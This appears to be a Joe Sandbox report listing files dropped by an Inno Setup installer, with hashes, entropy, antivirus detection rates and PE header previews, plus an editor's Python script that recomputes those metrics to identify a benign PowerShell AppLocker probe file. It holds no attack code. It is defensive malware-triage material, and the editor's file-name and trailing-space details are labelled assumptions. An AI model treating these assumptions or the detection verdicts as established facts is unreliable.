Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
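Added example, not part of the Joe Sandbox report: the entries above with identical hashes are the probe script that every powershell.exe start writes to the user's temp directory to learn whether an AppLocker/WDAC policy would force Constrained Language Mode; one copy per PowerShell launch is expected, and the file itself is benign host noise, not a payload. The script below rebuilds that 60-byte file and recomputes the size, 8-bit Shannon entropy and MD5/SHA-1/SHA-256/SHA-512 digests the table lists, so an analyst can confirm that a file recovered from a host is the same artefact. Two things are assumptions the report does not show: the on-disk name (__PSScriptPolicyTest_*.ps1) and the trailing space that takes the 59-character preview to the reported 60 bytes (it is consistent with the reported entropy). The Python code is the editor's, not Joe Sandbox's.

```python
"""Recompute the per-file metrics a sandbox report lists for a dropped file."""
import hashlib
import math
from collections import Counter

# Constructed input (assumption): the probe script powershell.exe writes to
# %TEMP%\__PSScriptPolicyTest_<random>.ps1 at start-up. The report's preview
# shows the comment without the trailing space; the space is assumed because
# it is the only single byte that matches the reported size and entropy.
PS_POLICY_TEST = b"# PowerShell test file to determine AppLocker lockdown mode "

# Values copied from the report's dropped-file entry for this artefact.
REPORTED = {
    "size": 60,
    "entropy": 4.038920595031593,
    "md5": "D17FE0A3F47BE24A6453E9EF58C94641",
    "sha1": "6AB83620379FC69F80C0242105DDFFD7D98D5D9D",
    "sha256": "96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7",
    "sha512": (
        "5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3C"
        "EC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82"
    ),
}


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (0.0 .. 8.0), the report's 'Entropy (8bit)'."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def file_metrics(data: bytes) -> dict:
    """Size, entropy and digests for a byte string, keyed like the report (upper-case hex)."""
    return {
        "size": len(data),
        "entropy": shannon_entropy(data),
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha1": hashlib.sha1(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
        "sha512": hashlib.sha512(data).hexdigest().upper(),
    }


def metrics_for_path(path: str) -> dict:
    """Same metrics for a file recovered from a host."""
    with open(path, "rb") as fh:
        return file_metrics(fh.read())


def compare_with_report(data: bytes, reported: dict) -> dict:
    """Map each reported field to True/False depending on whether it was reproduced."""
    got = file_metrics(data)
    result = {}
    for key, expected in reported.items():
        if key == "entropy":
            result[key] = math.isclose(got[key], expected, abs_tol=1e-6)
        else:
            result[key] = got[key] == expected
    return result


def looks_like_packed(data: bytes, threshold: float = 7.0) -> bool:
    """Entropy triage: values close to 8 bits/byte usually mean compression or encryption.
    The 7.0 cut-off is a common heuristic (assumption), not the report's own rule."""
    return shannon_entropy(data) >= threshold


if __name__ == "__main__":
    for field, ok in compare_with_report(PS_POLICY_TEST, REPORTED).items():
        print(f"{field:8s} {'match' if ok else 'MISMATCH'}")
```

Point metrics_for_path() at the file taken from the host and compare the dictionary with the report's entry field by field; a digest mismatch with an identical preview usually means a different line ending or encoding (the report says "no line terminators"), not a different script. The entropy helper doubles as a quick packing check for the PE files later in the table: a 4.2 on a 6 KB console stub is plain code and data, while the 2.9 MB DLL reported at 7.09 is close enough to the cut-off that the result depends on the threshold chosen, so treat it as a prompt to look at section-level entropy rather than a verdict.
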
Process: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp
File Type: PE32+ executable (console) x86-64, for MS Windows
Category: dropped
Size (bytes): 6144
Entropy (8bit): 4.215994423157539
Encrypted: false
SSDEEP: 96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
MD5: 4FF75F505FDDCC6A9AE62216446205D9
SHA1: EFE32D504CE72F32E92DCF01AA2752B04D81A342
SHA-256: A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
SHA-512: BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
• Antivirus: Virustotal, Detection: 0%
Joe Sandbox View:
• Filename: file.exe, Detection: malicious
• Filename: hkQx7f6zzw.exe, Detection: malicious
• Filename: hkQx7f6zzw.exe, Detection: malicious
• Filename: aeyh21MAtA.exe, Detection: malicious
• Filename: aeyh21MAtA.exe, Detection: malicious
• Filename: aesM8nmCM2.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: OFjT8HmzFJ.exe, Detection: malicious
• Filename: BJqvg1iEdr.exe, Detection: malicious
• Filename: iv2Mm5SEJF.exe, Detection: malicious
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................

Process: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp
File Type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category: dropped
Size (bytes): 23312
Entropy (8bit): 4.596242908851566
Encrypted: false
SSDEEP: 384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
MD5: 92DC6EF532FBB4A5C3201469A5B5EB63
SHA1: 3E89FF837147C16B4E41C30D6C796374E0B8E62C
SHA-256: 9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
SHA-512: 9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
• Antivirus: Virustotal, Detection: 0%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp
File Type: PE32+ executable (console) x86-64, for MS Windows
Category: dropped
Size (bytes): 6144
Entropy (8bit): 4.215994423157539
Encrypted: false
SSDEEP: 96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
MD5: 4FF75F505FDDCC6A9AE62216446205D9
SHA1: EFE32D504CE72F32E92DCF01AA2752B04D81A342
SHA-256: A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
SHA-512: BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
• Antivirus: Virustotal, Detection: 0%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................

Process: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp
File Type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category: dropped
Size (bytes): 23312
Entropy (8bit): 4.596242908851566
Encrypted: false
SSDEEP: 384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
MD5: 92DC6EF532FBB4A5C3201469A5B5EB63
SHA1: 3E89FF837147C16B4E41C30D6C796374E0B8E62C
SHA-256: 9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
SHA-512: 9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Users\user\Desktop\file.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1160704
Entropy (8bit): 6.3941502469827425
Encrypted: false
SSDEEP: 24576:MYwCLCUplZhgjXj8YcgoniqO3CBiO0jaS+EtjC67V5MNx9XU:3GUhni7iSFCQGu
MD5: 14C6FA8E50B4147075EB922BD0C8B28D
SHA1: 0FAAD18B0E26CE3B5C364621A4F0AEE9DB56A9A7
SHA-256: 90C4A61AF494B63ECFE1226714175675A4E49E57D50718491B3BC8FE29DD8FC7
SHA-512: E6C35BBCAA9A8BB306E58BB91AADF5FEED6B1AD1DF6EE0E68BF3BAE9B76D84C862B4EE9DD87A1D288FE1B7AAAAC13467964436A09EC529F67AF50905CD0EF876
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 2%
Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...V..O..........................................@..............................................@...............................7......<...........................................................................X...x............................text...<........................... ..`.itext.............................. ..`.data..../.......0..................@....bss....pa...............................idata...7.......8..................@....tls....<............ ...................rdata............... ..............@..@.rsrc...<............"..............@..@....................................@..@........................................................................................................................................

Process: C:\Users\user\Desktop\file.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1160704
Entropy (8bit): 6.3941502469827425
Encrypted: false
SSDEEP: 24576:MYwCLCUplZhgjXj8YcgoniqO3CBiO0jaS+EtjC67V5MNx9XU:3GUhni7iSFCQGu
MD5: 14C6FA8E50B4147075EB922BD0C8B28D
SHA1: 0FAAD18B0E26CE3B5C364621A4F0AEE9DB56A9A7
SHA-256: 90C4A61AF494B63ECFE1226714175675A4E49E57D50718491B3BC8FE29DD8FC7
SHA-512: E6C35BBCAA9A8BB306E58BB91AADF5FEED6B1AD1DF6EE0E68BF3BAE9B76D84C862B4EE9DD87A1D288FE1B7AAAAC13467964436A09EC529F67AF50905CD0EF876
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 2%
Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...V..O..........................................@..............................................@...............................7......<...........................................................................X...x............................text...<........................... ..`.itext.............................. ..`.data..../.......0..................@....bss....pa...............................idata...7.......8..................@....tls....<............ ...................rdata............... ..............@..@.rsrc...<............"..............@..@....................................@..@........................................................................................................................................

Process: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1183089
Entropy (8bit): 6.3663933835404425
Encrypted: false
SSDEEP: 24576:kYwCLCUplZhgjXj8YcgoniqO3CBiO0jaS+EtjC67V5MNx9XN:fGUhni7iSFCQGz
MD5: F1ED953D31A56E4899772A56604685B5
SHA1: C56DA596FD92B48D2B062C16131A1CFDC984853F
SHA-256: 438A002FB9CD0BD061345C8F098C69C4249CE0B0D9AC3F1BC5CB3701BA6093EC
SHA-512: 514131A00232CDE458F50FB8AABEC5D415B62101A814520B8DF7C32AD24C23409C76A64D513B3FD96F526A461DE2531AEAA59A187D647C946DE5B51C52177E8D
Malicious: false
Preview: MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...V..O..........................................@..............................................@...............................7......<...........................................................................X...x............................text...<........................... ..`.itext.............................. ..`.data..../.......0..................@....bss....pa...............................idata...7.......8..................@....tls....<............ ...................rdata............... ..............@..@.rsrc...<............"..............@..@....................................@..@........................................................................................................................................

Process: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp
File Type: InnoSetup Log Little Leg, version 0x418, 3667 bytes, 835180\37\user\376, C:\Users\user\AppData\Local\376\377\377\0
Category: dropped
Size (bytes): 3667
Entropy (8bit): 3.7596549004290343
Encrypted: false
SSDEEP: 96:RTzG44NWzpZn3ZCdfc1AGlEDA4MZAe2LUHhxo:RTSxYpZ3Ef7fDSmUHXo
MD5: 4BC88505FFE4E8F89297325C9D2DEEE0
SHA1: 9CA44B06D9950178AFA4E432626F421A041B683C
SHA-256: C42EDF047B7B5D19F804B93ABE1D788C8A11A4427A941809F50CA46BAF22D05A
SHA-512: 5914A28144F7AC0D94D162D8B53407FFD1B23BBFE3B31D27CB9AF23A7A6B334ACAB9314E150398B22143756EC59996ED9569524BEC7D61F2E531DF34B47C07EC
Malicious: false
Preview: Inno Setup Uninstall Log (b)....................................Little Leg......................................................................................................................Little Leg..............................................................................................................................S...%...............................................................................................................I_.2....x.............s........8.3.5.1.8.0......j.o.n.e.s......C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l................:...'.. ..............IFPS...............................................................................................................................................................BOOLEAN..............TEXECWAIT.................!MAIN....-1..'...dll:kernel32.dll.GetCurrentProcess.......(...dll:kernel32.dll.TerminateProcess................ ...RESTARTINSTALLERWITHSILENTPARAMS....-1..EXPANDCONSTANT........EXEC.........

Process: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1183089
Entropy (8bit): 6.3663933835404425
Encrypted: false
SSDEEP: 24576:kYwCLCUplZhgjXj8YcgoniqO3CBiO0jaS+EtjC67V5MNx9XN:fGUhni7iSFCQGz
MD5: F1ED953D31A56E4899772A56604685B5
SHA1: C56DA596FD92B48D2B062C16131A1CFDC984853F
SHA-256: 438A002FB9CD0BD061345C8F098C69C4249CE0B0D9AC3F1BC5CB3701BA6093EC
SHA-512: 514131A00232CDE458F50FB8AABEC5D415B62101A814520B8DF7C32AD24C23409C76A64D513B3FD96F526A461DE2531AEAA59A187D647C946DE5B51C52177E8D
Malicious: false
Preview: MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...V..O..........................................@..............................................@...............................7......<...........................................................................X...x............................text...<........................... ..`.itext.............................. ..`.data..../.......0..................@....bss....pa...............................idata...7.......8..................@....tls....<............ ...................rdata............... ..............@..@.rsrc...<............"..............@..@....................................@..@........................................................................................................................................

Process: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp
File Type: PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category: dropped
Size (bytes): 2968955
Entropy (8bit): 7.086805464698464
Encrypted: false
SSDEEP: 49152:ekFE961ytt8iF+L3N4Tefv2HHcRnFuhBRh1l29gDQPpW1ra8h3gA/QMtJhGExB2T:9J1ytt8iF+L3NIcJFuf9SgkpWtv3J2F9
MD5: 87ABA2697A8DEDA3E1284A79780FF69D
SHA1: 21DFE5AA0E8F32688FAEE3AC31652392696E0908
SHA-256: 736AF8F850EBF9FBF744002845787425AA493A5D11202094381051EE66568582
SHA-512: 3A55DF4BDD9F46126B85484E19BFD53AB8F744B073B1CFE42D9FFEC101947A5A318B16FF7D446FB97834440A1F9D8EC1FFB82D3E67388027E62CAD000CF38616
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 3%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....>g....h%....&"...*.,..........0........................................0 .......-...`... .........................................q.................................... .................................(................... ...P............................text...X+.......,..................`..`.data........@.......0..............@....rdata..0H...P...J...4..............@..@.pdata..............~..............@..@.xdata...=...`...>...4..............@..@.bss.....................................edata..q............r..............@..@.idata...........0...t..............@....CRT....`...........................@....tls.......... .....................@....reloc........ .....................@..B........................................................................................................................................................................

Process: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp
File Type: PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category: dropped
Size (bytes): 2968955
Entropy (8bit): 7.086805464698464
Encrypted: false
SSDEEP: 49152:ekFE961ytt8iF+L3N4Tefv2HHcRnFuhBRh1l29gDQPpW1ra8h3gA/QMtJhGExB2T:9J1ytt8iF+L3NIcJFuf9SgkpWtv3J2F9
MD5: 87ABA2697A8DEDA3E1284A79780FF69D
SHA1: 21DFE5AA0E8F32688FAEE3AC31652392696E0908
SHA-256: 736AF8F850EBF9FBF744002845787425AA493A5D11202094381051EE66568582
SHA-512: 3A55DF4BDD9F46126B85484E19BFD53AB8F744B073B1CFE42D9FFEC101947A5A318B16FF7D446FB97834440A1F9D8EC1FFB82D3E67388027E62CAD000CF38616
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 3%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....>g....h%....&"...*.,..........0........................................0 .......-...`... .........................................q.................................... .................................(................... ...P............................text...X+.......,..................`..`.data........@.......0..............@....rdata..0H...P...J...4..............@..@.pdata..............~..............@..@.xdata...=...`...>...4..............@..@.bss.....................................edata..q............r..............@..@.idata...........0...t..............@....CRT....`...........................@....tls.......... .....................@....reloc........ .....................@..B........................................................................................................................................................................
                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Entropy (8bit):7.958379968512178
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 98.86%
                                                                  • Inno Setup installer (109748/4) 1.08%
                                                                  • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  File name:file.exe
                                                                  File size:1'769'630 bytes
                                                                  MD5:fecd099f9b8d9500d7199a1054397e3f
                                                                  SHA1:3df235780c9ad851474c20338e4921f5f2decaf7
                                                                  SHA256:96a60b6cde63794b637bce219083e7905560c626e68c00af1d99be451c8c3700
                                                                  SHA512:e8559b435fc053460cc7d5ba6755c1b8aa659f2bc620bd13f7ac6db7da846088018baf07c630f2fc97769e5da0d0bbc2fcd9b400b7166c6aa5cada4d9a85eca0
                                                                  SSDEEP:49152:zUjKZGiyt7lO9kwWzJLPKeVMFZkYilgWRqadRRnqxD:iflWeOeV8ulCaLc
                                                                  TLSH:9A852303F3C70475FA6855799896D248AD237CB914F6AA3E3CF8EA0F19781C24C76A71
                                                                  File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                  Icon Hash:2d2e3797b32b2b99
                                                                  Entrypoint:0x416478
                                                                  Entrypoint Section:.itext
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x4FC4B854 [Tue May 29 11:51:48 2012 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:5
                                                                  OS Version Minor:0
